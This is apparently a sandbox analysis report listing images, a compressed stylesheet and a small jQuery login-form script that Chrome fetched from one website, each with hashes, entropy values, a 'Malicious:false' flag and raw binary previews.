                                                      Preview:.PNG........IHDR...............^.....PLTE_=.G-..`#.S.,..V5.lA..f.......l(sJ...............t*..1Y......v66!.p[!.l4......PC5..6..P.Ci.... ......0....6........./M......#.6.|..@.....f1......&..S.m.UUG.tD.....r.Z.}...H.T....\...ne:....u.......................\y...\.:..N.r..EaP4.....$.....K......t.}H....r....D.......}.....r....d.l..P..H........:........r..t@NG))(..%..:......aO..|.....i:..4=;...O..J....f.........l`Y.f.....^.UO.l... a.....[.U.........}.v.M8......`.......!..ri.6+h......M..6@>#.2.py^.....aeh~...b...HB..........Be.....NZX./.|.........*IX..-.,.8+w.......m..<...Og...[.M.9.V.....LB=.8k...N..Y....i....0....b.s.7(...B...'....g.jR.c..8{....^..Klf.V.iW.;...3......p5x..F....r..n...W... ...OE.P4Qq.\.....`\..........|.F=..=J...\.-..u.IDATx....@..'I.m.M.6..X-.U->.O...EZ.bA...Z.......(.((....QW.\.N.q.......33./D..L'......3g...#.s..o.T*.cI5...l.0.-'..Z..x..9...NZ..ey...7.$..s.c.L.m=Ww]<)oy.+..}........A..2eJs0....$q.. .(.+J..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, from Unix, original size modulo 2^32 4646
                                                      Category:downloaded
                                                      Size (bytes):1688
                                                      Entropy (8bit):7.8819002676529495
                                                      Encrypted:false
                                                      SSDEEP:48:XwSYCKJm4cUdibUNhU/+wjuTfRHAFI64+oXTibX2H:ASYLY4cAibAhdzxeIjv0Xe
                                                      MD5:26858BCBB64A4A934FDD4CF574DE9032
                                                      SHA1:179172658D577B5CF0BB6445C7EE5732BFEE574D
                                                      SHA-256:89D297DB501CBD5C5E076E961FBD41808E6184A3292D2C648F75F61148BF1366
                                                      SHA-512:115265F71B7EF65DE5D1B5EBAEDE483A9ED3A2AB2695D4CC4135618DAE11778E1DA485F9F885FC55E6B43FDA1E557F226716A0D1F1868CE2B107D7E955CACC16
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/css/unite/header_unite.css?ver=1618279364
                                                      Preview:...........XYo.F.~..X.0|..)Y'..9....>...\J[.\.\.N...C..zk.4/i.$H.$E.>...k.._t..%R.#C.H...~..7#_v&8..G...u.._....66...{g.=>zt...}.?....y......hcck....DC..;3..x.....|.o....S........].M...pl.....os..#.o..kq.>G....e....{...k0....Gc.Z&..g.A1..g.a>.,.<p.2.Rs.'......X..K.|..^sd.y..O.gB}w..^g....a...&3...1.....,$..M......F(..6.b..#.....7.3.+..p.Al...N.6.a@.M.YY..xJv..p.Kfh...q....f..tLqby...4.-$..{.....O]07..mlk..G@X0......o..t.8"..:...n..^.Y`.\.f.......`..Y......nc....$....N.v..x<!t<.t.dz......@...I&#..qhPN.....#r.1..WbC8B.'.....><.......?.....K..j)*.X...x.......c.6.a.3.K....l.F...+..dw.....u..B.C......ht..se}.bI?.......^.8......YED .....G..P...B..s.zE.7...A......u;..9 )....c..$.9$..$x.......}..T....go.?}....S F..R..v......Y^t.m4..A?...PR.."<...]b..S`.VRfJ...4.&<..vk.Fi...o..Y.[YQ)}.oP..N.}..V...A...j.E...T..r......e+*..xId..p).......k.60.....!bY..C&....0..7..&.U..0..I.....p..%$t.(V. .aw......!.N...p.$Q,.O.U.W.B)..ON..;y.w-...s..*....-N.(T...h.....+QP,..V.D.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):12129
                                                      Entropy (8bit):7.955243755221839
                                                      Encrypted:false
                                                      SSDEEP:192:RKG6SafJtAyXeOlPXZlxrsWGqjA/xWbfBArCo2+akzqL26GoSJfhlU4:Rxaf37rXiwjA/xWKCo2XkWGBv3
                                                      MD5:5F5202C81B799897771A1CF02D4DC6C7
                                                      SHA1:B4FC1F022CA5B1315842E78E9A2AF633A3934F5C
                                                      SHA-256:9F717A195453EE80C8E5E17D3F3BCC95A41DC06EC53A377A0D27A32E25BCFE2E
                                                      SHA-512:FEA1DAF8E8C340F7117C2CA45499CCF68C724F4BF622B70778285C6F9BAB0D1A5DCBBBBFFCA693CAFD5DDAF14DC7ABADF96E4D2CB42720499625678B50DF363F
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P......PLTE.....................#$....ig.+2.......67...QU.WM.aX._`.yz.....a...hj.wp...eg.y...{.p.9>.nh....L@.}..w.]O./0.RU.WW.@A.ce..$.. .....&&.KK.CD........<C.=B....46.&-.e[.j.FI.t.<A......}.......................y.........ZC.*&..../).##.!!.......,(.J:..........\E....bH....@3.&$....<1._F..........P=....WB..........F7.6.....iL.............c....9/.U@.R?.C6.'&....fK.L=....o.\.1+.4-....^..........`.qQ.kN.g.nO.j..Y.e.|X....tS....wU......r...m.dI................yV...................................................GJ.....&..................01.40......89....pt.hg............,).......IL......gj......ve..w~.hn...rv....$0....:B.?4.....s.TW.2<........]`..#....^c.<I.J9.LT.>?.SW...{..R\.<B./9.......}.t.[a....CK...."....EtRNS.....)......::..K*...o..I..wZ=.].......r].O.....i.....H.y.....e..Q..}..+.IDATx...1j.0.@QK.K..x.8uh-.*...0=B...R.^..w...C..EIn..w........................InL{.:..h..l..'..O.t
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 2 x 28, 8-bit/color RGB, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):1002
                                                      Entropy (8bit):5.857229472885001
                                                      Encrypted:false
                                                      SSDEEP:24:Gr1h4SHWwh82lYSKwN6vYw7VLIgT3XyJ3VKN6v/GqQgp:8KS2vnLiQTeJ3++tJ
                                                      MD5:00F172ED66E94F4AF82D9A0AE99BDB6E
                                                      SHA1:51651BC78E955C872778349074CC93AA18F8D8F7
                                                      SHA-256:29895677B34F551B8CFA01B36893909515BAEAC1C8F397295F256FF50D379FD4
                                                      SHA-512:1576E0020FB93F26E93A7393E34AFE27B3456E480E29B246087B4A330EFE163E36AB47B8C9CCF23F34C19941EC9221F2BCDD484535D245419E06FCDC6838932F
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...iiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:75C8186921AAE311B4D0B41277BB2166" xmpMM:DocumentID="xmp.did:2408B638AF4911E3981BF40208535E06" xmpMM:InstanceID="xmp.iid:2408B637AF4911E3981BF40208535E06" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:ee31920c-d0c4-2c48-8b7d-90ad1e71f71f" stRef:documentID="xmp.did:75C8186921AAE311B4D0B41277BB2166"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>%.^Q....IDATx.bd.....gb...I.....(.H.^......IEND.B
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):20678
                                                      Entropy (8bit):7.976680745513207
                                                      Encrypted:false
                                                      SSDEEP:384:ngdK084X0btzWvbYcVZidreRLJ74dnfp0c3acEQEtFtKYQgYLTPdXtrv:ngdKx4kbMTlVZMyRBynfpzKcErtKYNY3
                                                      MD5:8B870FCF3B971673029D5B90559D47CF
                                                      SHA1:1697425C64FA897666DF7822A2091E9559E481D6
                                                      SHA-256:3167AFC8EC470A3510BE1BCE1426DB8306F47216BA3D2DCD1D0AC7247443E1E4
                                                      SHA-512:A4745FC13DC7FA680D86180B98442654F0D49001FDE8C75C68A08365F0D24EBCD890B9B874B34C3757C1486B55A5410E0DC1286F0F6651C4EE35F3D3E211CE45
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....gAMA......a.....sRGB.........PLTE.&..=..i.Ke..K.../.+.6Y..P..F..^..w..p.&P..A..d.?\.:]....Sj.E`.?d..W.....8....,X....7j........6.7.3a...K..%[r..3.{..es..0..W.&..)y..f%.?.......(o..f60S....)f...A..V.Z2.H...>q.$].2...B..w..Z.l..q: ..b.M..P..w,8.......N..q6w.......s,.r<.G(..K\k..H..<..qy.H.........$.C..,.A..l...g~...6Hn...........^......\..r...\.Oj3.......8...^. .g...-..yP$.........G.}.Nw....h...c}@ ...,..../.N....]g...T.2.h..Q.B....!..H..R........-..J.........w;X..."...*..RG.o...U2...j....8.H......../.^(..>.R.."@....bm."Z...`O.T.$.u.iZ.......K|...>...-P.H.....ux!U...k~.)m..2.$..t|..M..c...JW...e.@/...5j.....g.l..a..y.....?{.>.B.eF_........zP........4.B.P0....kC.[.<.........iX.F......2%...Y|.oL..P..T.W.._l}..?....Ss.x..){'...c %.......T;8.z.{.Ww*......J.caFVg{.. .IDATx..{\Mi....q.8M(.O....CBQ6..#5h4C..v1.B.S*wG....'SD.$.0rf.L....0.4.=....~_........{.....k]..z...Zk..........{=....}...&t...l...!.......=Z...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 32 x 32, 4-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):441
                                                      Entropy (8bit):7.22372680769518
                                                      Encrypted:false
                                                      SSDEEP:12:6v/7DY8VBjIGlhjV0Yk0L2mrgVqpZ6vzVLzbFho/Nz:H8/IUjjc0UqpZ6JLV21z
                                                      MD5:950CEAC8F20AD504E908C855FEF89833
                                                      SHA1:694BDD9709A9BB3BE26C6F7BB350205EB44AC7B3
                                                      SHA-256:E17939202163E612402DBF251414BBB4E5FAFFDD133FDCCD0BF2AFD356E0D635
                                                      SHA-512:07EF639D2D340FE07A2C32C06D67548675B57884E9C89E508CD1ABCE17DAFA0E33BDFF120C5C6F41E7FBB9D68F32908E859ED01B0D6F27A1FDB28B040749D289
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/footer/footer-18plus.png?ver=1606790107
                                                      Preview:.PNG........IHDR... ... ......Tg....0PLTE.........|||===```555,,,JJJPPP......mmmYYYDDDvvv...c....tRNS.@..f...7IDAT(.e..J.A..O.....I"..,BJI,,e...4.l.(X....f}.5].0 .XYj..bcacea.S.s..n.W.o..a.@.y!.....Sx..6.G......Yj..t]...+....&....9.R.qw..../!Mm.n$r~&.....4.@f....#.%x...J..#.....c../..z...)...\...m+...i.]#..R..k R.V.B".b.&.H......<=.6....Z...........x\m....j...h.3.U..c4dG:......whG...3......#..Q....r....8N7.j.......IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 80 x 15, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):944
                                                      Entropy (8bit):7.261909973916971
                                                      Encrypted:false
                                                      SSDEEP:24:R6atw9AHyvVSBn5CaJzBaW2uyu+Qqo5hX844wN:wQw90yvVSh5tzT6u+D+XAwN
                                                      MD5:4877463A72742C21C36F198ABAA72496
                                                      SHA1:B6286B50E4C7F1B551EA5D038AFB40A6905CBA6B
                                                      SHA-256:10D9F5A229D90B3553C14A9C48B3B94E927257AA6CD252EE7D4C12FDAB6E0757
                                                      SHA-512:8F770782F78FA54F42CF3FB82353525BA56494347D6D6730BE29132CD7DD97105C61BAD8D662FEA59749248B98039F731E57B0CEF4BA09E0925D7D8A29276589
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/index/en/btn_start.png
                                                      Preview:.PNG........IHDR...P.........D.......gAMA......a.....sRGB.........PLTE.........................................................................................2..&...zj..*0&.gY.......k\..y.../..2..(....*VI......1..1.....(.,.,TG.........%eV.-$...!.z.......F;...0.+.....!.. .o.....z..{..v..r........".....#.....$..!..%.......%......)..!..&../.....2..n....\tRNS..`0....@.p...P ...........$...r.<b.%f.... .U.......R+(.$.....J.....t...Om../.......-..M...'.f....IDAT8...r.0.E..]9^.t...{.8.N.....F..........p...I,.\[..9.../.M.....<.tweq8k. ...x.8...R...FCx..b...T&..F....&`9zlc..Q.i....h`g...v.?w...m0.7.+...@]{....R5..P&.$....o.]%v.J...Y."....4!..#..A..:q/z.4$....xxa...JD...9.....GBZ..N..="P^._..c.7.;9...3Q..X}...v..;..n..l9....H.H@..]!*...#......].x...j.2)-....~.(M&`E*[.D.Ic..&.;..S...'...i.q.A@.1.v...s.=.5.2..#..l.S.`<.[.*....^...5....)T.G.[%.........].H......A.!.@.}....p...M.3<.....s......}....t.R..#;.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):6451
                                                      Entropy (8bit):7.937442105949379
                                                      Encrypted:false
                                                      SSDEEP:96:PNHrCzEt7hN46kZVVtA1VCLDwX4RbzUIKxczz760za2w+Palwj/dBGc5Pf6lMIQ:lQPfEEL1zBKxWE2w1lwj/VfsMIQ
                                                      MD5:F902D04FDF4C35A29DB78B8DB71862BE
                                                      SHA1:0C955FA290ADF74A6740A3F8DE830BD8E680B0D7
                                                      SHA-256:7C68E6435C6596E06354872485D3E44D241501B7F05D04F2D167A5DE93D53074
                                                      SHA-512:5F982FB0AF460ADD20679351B6967A731ED2C3D1AC3F6D8E7698ACFBDC4CDF3E5B29D232086F15EE4183C1A1F25A1BC235BCD2E4EF0D7FCA58D3F7DACFA1374D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/93_egame_logo.png?ver=1606790110
                                                      Preview:.PNG........IHDR..............P.....IPLTE............hs....-_.1a...V..k.gq.Fp.......x....-]7Fp.:hKU}.s..K}%...a~|..<..g...].#U.^..;0d...!....[.:`G...>d.)P.'N.([.,N)..2|..r..>f.....\.*_.2c.6j.?t....*d$)d.Ey....L~.../(c.S.))h....b..Y....;(k2)k.i.....$g....w..$\.o.7(eL'cD(kl)qA'c.'p.]..~..s.L&j~*s]&mT%lf%nl%c.&\V%c.,ux'q?+nt-tW,`v%b.$b.'Y.&TK,od$c.(\c-_.'f.+q.)h.'`.&\w-\.(Z.'Q.+t]%c...T-n.,U.*o...)t.,Z...^.q.'d.'].(^.'^.*Qn-\.'O.(m.,W.,T.-tx.i.)f.)O..d...l-f.(N.+t.+t_-h.&f.-t.....c.1t..r.-q.-f.z......u.%f..eFT..../l.{.=v.$:i.|.]../c.......Yh.......L.7......e.oL....k~....u.....8..[I......G...N....b..0Ht.I.88...../tRNS.. .Fr[..C....M.`2....y..[.A.p.............(O.....jIDATx...1..@....G..u...L(.j......x.K*;.:L.s..C"........S...................>O..1.1F.P.Z.M.]..*n.r....Olt..G.....}...rr.b.Y..|$iV..oY*.E.ey8...9,+....>L...h.E.E...N:N..].w.Y.0..;_S=. .k..q]\.....T.]....Z.....#...t9......&.(..-....(....D.k.a.......5..H../+}.j..h.......0H......ba../.w.3O.H.......
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 210 x 216, 8-bit/color RGBA, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):9237
                                                      Entropy (8bit):7.842128343150627
                                                      Encrypted:false
                                                      SSDEEP:192:ESLkn+Lp42swygyfFBzBkFlkZJM97Xq8uel5m1/+t8QdQTvmmt33lVb:Dgn+LpywufH2lkZJr8j54G+L93D
                                                      MD5:9BDD6B8D5589D397DB7068D3A294DE42
                                                      SHA1:98B5BB4CB3D46F59DB14AB9F2EBB2B54348202F8
                                                      SHA-256:6B53A71F33B8A9B1C81F84E0371A4028A1E7D2F1B6FDDA72AD3CBF5CF99194CA
                                                      SHA-512:641884CCBCB09834B95F57F6D1A7225FDC611ED6F54FB933DDA63E33A34FFB440A9F9B873A0B22344EE9B8D364DEC93AFCB4CB8191A8694E32AF13953C828A26
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/index/en/NCDBC_210x204.png?ver=1700473741
                                                      Preview:.PNG........IHDR................$....pHYs................xiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 21.2 (Windows)" xmp:CreateDate="2023-11-20T17:47:45+08:00" xmp:ModifyDate="2023-11-20T17:48:43+08:00" xmp:MetadataDate="2023-11-20T17:48:43+08:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:fbb02b9d-50c0-4945-9e3c-a8da066ca48a" xmpMM:DocumentID="xmp.did:fbb02b9d-50c0-4945-9e3c-a8da066ca48a" xmpMM:Original
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 210 x 216, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):9237
                                                      Entropy (8bit):7.842128343150627
                                                      Encrypted:false
                                                      SSDEEP:192:ESLkn+Lp42swygyfFBzBkFlkZJM97Xq8uel5m1/+t8QdQTvmmt33lVb:Dgn+LpywufH2lkZJr8j54G+L93D
                                                      MD5:9BDD6B8D5589D397DB7068D3A294DE42
                                                      SHA1:98B5BB4CB3D46F59DB14AB9F2EBB2B54348202F8
                                                      SHA-256:6B53A71F33B8A9B1C81F84E0371A4028A1E7D2F1B6FDDA72AD3CBF5CF99194CA
                                                      SHA-512:641884CCBCB09834B95F57F6D1A7225FDC611ED6F54FB933DDA63E33A34FFB440A9F9B873A0B22344EE9B8D364DEC93AFCB4CB8191A8694E32AF13953C828A26
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR................$....pHYs................xiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 21.2 (Windows)" xmp:CreateDate="2023-11-20T17:47:45+08:00" xmp:ModifyDate="2023-11-20T17:48:43+08:00" xmp:MetadataDate="2023-11-20T17:48:43+08:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:fbb02b9d-50c0-4945-9e3c-a8da066ca48a" xmpMM:DocumentID="xmp.did:fbb02b9d-50c0-4945-9e3c-a8da066ca48a" xmpMM:Original
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):1805
                                                      Entropy (8bit):7.52113263704263
                                                      Encrypted:false
                                                      SSDEEP:48:HBj/CMts1+vpiymKbI984gxKy1ljvs/d+ZSytq:l/2MiyZM98hKUjE/dNmq
                                                      MD5:1E1D769E827DC5105B8BDC6F0492AD18
                                                      SHA1:DD3E459A39B9872552CB6B6FBFF89E59AE7C53DD
                                                      SHA-256:3C783B8B36FEC7029E650B98568ABC47B2AF9C82E098E75C3E019AC8EB042B43
                                                      SHA-512:35C7D8304102CD82015CB7CD8CDE65DA42F9B17070A1105EAD56801C3F743B1EAE3EF6C47C093799A8645C0CABC81064D2236DBB0F8E53D7CF0B52AC02AD2524
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/59_egame_logo.png?ver=1606790110
                                                      Preview:.PNG........IHDR..............P......PLTE...."&.)-.&*.'+.#'.%).%)."&.$(.$(.$(.%).%).$(.(,."&.(,.&*.$(."&.(,.(,.(,.$(."&.%).(,.'+."&.&*.%).#'.&*."&.#'.(,.'+.$(.&*.)-.&*.%)..-...."tRNS.@@@.....` ...... ...`....0..p0P.Bi.....IDATx..............................=8........m.UUUUUUU..[j...0.@.@i..Q.Z..../P..P.[7..{.d.|...a[.s...8!....^:......K..y.....GO....u....[M..~w@4.7.f|a......C...).@D..-..L|a0.q.:L..`..3..'..1..H....r\0.:.{ .3....aV.0.1.&.A.........e.,A..%B.\.0..H.0..L!......c.0W....!..|a..`.0F........E..0a.A..J.0...P..{&..Ua2..<.`...5.f..0U,..[..=.....2L.B.....`X0.(..X..[_..3..L..0..aV..r29.&........b2...,a....0.....4.L...06.....&n..Ia..k.0..9.4g..`R!..<a..D..3..`...@...Lf.Y.`0..&.`.Nw..0...k....9-.....V..JU...........Q.y<a.O.jp...h0.%....S...`......=a........f.D.l=aj.n0.......0C>..$........fp.Y`d..... 0vl.A.a......0....~....fPT..?L...TT...a.z.0CB.Q.0...9Ra..9`.0....0.T`j*...0.L.f0T..0.$...0H.`.L.f0T....)..T..`....`.0......`....x`2L..+.....s..`....8`..`.2*.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):5519
                                                      Entropy (8bit):7.9258709193212455
                                                      Encrypted:false
                                                      SSDEEP:96:xL8h+ttFQYDo6YEqFviei/L1dcHdgXpt5hf0hh78u5rJgBA4yAVW/FVGrL3n:xYh+ttgEkyL7igXT5hf2h7x5rJCtPwgT
                                                      MD5:A6B631BFBAA204CE6975180486610770
                                                      SHA1:5C26483EEF79D06DCCB073C6D62AE373D52F8D82
                                                      SHA-256:BBDD424268A479CEDAEBF778E5679A6A4258940168751FE89CA04074F34B3F44
                                                      SHA-512:ED0796A83A6C42910EF3C02BBBB62FB565CCEBDC37F3664BE21C5BBA6FD10B3107B7992B2D78B5E93F38B440E8C2C68E700DC59123982395A731AE04E1828B84
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/202_egame_logo.png?ver=1673549406
                                                      Preview:.PNG........IHDR..............P.....CPLTE......???...???....v...$......QP....f].ppp...m`.?9.0,.dW.92..............s....,--)%.....-..$dee"....%WM.!!!..&...wk.}n.ME.G?.............RSS......NNN.......|.kmm..............ooo{{{......rf.JLL...---.........VVV....$..2[[[ABB...>>>aaa......y{{\T.899........5.....(..4../....+.(UUU...../.......2../../..........-.....;../.....-...*..........,...../..6..2.....2..8../.+..D........1..6../..8..=..0..K./.....@.*..:.,..-..0..D..H..7.......L..:.....F..E.....6..4........@..5.....2..1.1.5..=........?.....9.)..:..F..0..8..7..P..C.0....B.:..C..C..@..?..F..2.=.<.D~....._tRNS.......................A...................6.............h\M....-..{......pN..............Q<.T=....IDATx...... ....!H>q...0V&.?.....].............................,-..3...+..C..~c{?....E.....-t.u.%...;)j..dh.Rj.........*.U.(..b.j" `&.f.fZi.Z...s...a..z.>..;...|9....xc..3'6......{K._.1.BY..U.^.e...w....*..yyz..5/...K...50=QUb_.G.5.-....8..}.s.a._.......2Pb
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):22138
                                                      Entropy (8bit):7.979874351501081
                                                      Encrypted:false
                                                      SSDEEP:384:Fmnha7sML/Zkdyll9Mnl4j3EuFkTIL6tbkVN+56aG3EuO8oaFUc9LJIvrW:FmhzMTZSyll9M0F2tQVNP1O8oKH6vi
                                                      MD5:E2099E972BACE8E277097C33120AF557
                                                      SHA1:594C8F2D43DDD71A486C032A7C1E40184A0080BC
                                                      SHA-256:B6B6BA467E8FF2C79FA85DA2985ED796DC33856F83FADA96C3639B2D4DA34E6F
                                                      SHA-512:8F3C6DDB8B2C88B6B057A08223020647C4304791C03CFF629EE298999CE4DEE98FA257066264C3E98754EB7CB5CDBE52865CC559A2FCF83E2B76925C699E43B4
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE&.6.....A..L........G...".U.....M.....X.....:b....2.....W..Z+.ch....@.....w...7.k...3..N............[.z.e...K../.8;q....2..[...9.c.....#....|....}..."j........[./.qC.r..D....!a....)......M.l...pB..ru....W..8...<...........eiZ9...#........0.....4.M.......T.....g.../.8.q.e.. ......?.... ...P...;....3$..W\...\&....x..k0..U..+z..v......kR.. ..(M.1$.i...../.m....l#....HS.EM..=5+7.....b.;]5P:.<....Ps..E.H8.........,...b+...@...(..x..=.O(-oG).F..D....4../....Sq.w..Y..W..`.9x0.G.. "...E)...?......WC@...B.H.......e....;.3...2....DB..G....5eg..<....-...P.........~._^..A..."..D.D7...-.KU..}1...|]...w..jNmSbh...}|e:.Q..w..?J....dk.h.)"....d.....Z..nsG..GBv.T.A#.l%..m..z9.u...O.^....._.^.`E.K..E......qY`..b...$n....X..i.5v.>u.S.........S....v+..R.....S5IDATx.l.n.A..`g....F#.2.c-XUK.\.e!F.}...J.......j..Au!.&...b.*R..3..%.......(..&...K..kc..DL_%.m_.)._....I...R.`.X..^.m.......A.....m=..,..M..S.I?....Z.a.3.......K0-.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 1 x 204
                                                      Category:dropped
                                                      Size (bytes):953
                                                      Entropy (8bit):4.889161594783408
                                                      Encrypted:false
                                                      SSDEEP:24:o9T/oV+jpUirgPosqkLcBNls13t5+BXuUlYea:oVY+jqiGoTkLcB813rea
                                                      MD5:0C494AC95BB7EFED1BFD157C74EDF4F1
                                                      SHA1:5A39F256A6BD4AE42AF00EDE6CC02046247ADE55
                                                      SHA-256:8BD961EA74A57AD2595A735D5A413CAA795D27DB0C0B530D749840665B0F4E0D
                                                      SHA-512:215412F750059B020413CACF06B22F3441F9D30A1F9CD3562BB8ACF12EBCB1AFAB8462A97060CD547AFA4B618E010A6618071B85D6DA1C53C809AC8872C29AC1
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:GIF89a........iM.zZ.{[.lO.mP.hL.vW.wX.qS.kN.nQ.rT.pR.uV.sU.xY.jN.oQ.jM.tV.yY.yZ.kO.xX.tU.oR.nP.uW.iL.sT.pS.yY.z[.jNB...tU.wW.lP.@,.oR..s.aG..p.eJ..r..r.bH.cH.sT.tU..k..c.wW..i.hL..`.{Z.dI..e..f.iM..o..n..m.fK.~\..q..^..].pR..b.yY.jM.._..g..h.zY.gK..l..j.}[..d..a..l..a.cI..m..i.qS..q..g.yX.rS..n..o.gL.uV..^.|[..h..k.xX.fJ..j..n.uU.iL.vW.pR..e.._..c.rT..k..h..p.dJ.vV..`..p..s.mO.}\..d.|Z.qR..b..f.bG.xW..c.......................................................................................................................................................................................................................................................................................................................................................................................,........@............4..`...."h 0.B...........7L...!...(.H.!.F. .v.`.............0`.QAJ.*-$`..cF..^..)Sf..4?<.j.&B.9snh@v..<{:(.`...A=....D..F.LDJ......e.T..O.*...;
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):191
                                                      Entropy (8bit):4.995729883842431
                                                      Encrypted:false
                                                      SSDEEP:3:RAM8HpRBEBc2LGRFE3BFKCMLFYYDQyRFf/N7NReLFMN1ML3vBKVQBIy5K/CyL3Hr:z8HpULZ3MLFYuZXZqRMMLfBXIykR3CDO
                                                      MD5:24BC8669CAF172F2C17A06FCD73AE539
                                                      SHA1:3BAD8F340BCA43D8FB98C3CA39DEF12F816769A8
                                                      SHA-256:29DF48677FD1C2B2A602C35FAEADD3693F083B78550B2C0F3108F356C34B74BD
                                                      SHA-512:0B4B2DC35F8B97238079334BE832751D1E33DFBBDDDA4961C38127AFADCB088101BAD71B0442BD810930DF2658DFD9F42DA0B08D44BB1E1F1DD0A5DDE33423A3
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:jQuery(document).ready(function() {.....$('#loginForm').submit(function(){... $(this).children('#loginSub').prop('disabled', true);...});.....$("#loginSub").prop('disabled', false);....});
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 700x255, components 3
                                                      Category:dropped
                                                      Size (bytes):38207
                                                      Entropy (8bit):7.968365258904347
                                                      Encrypted:false
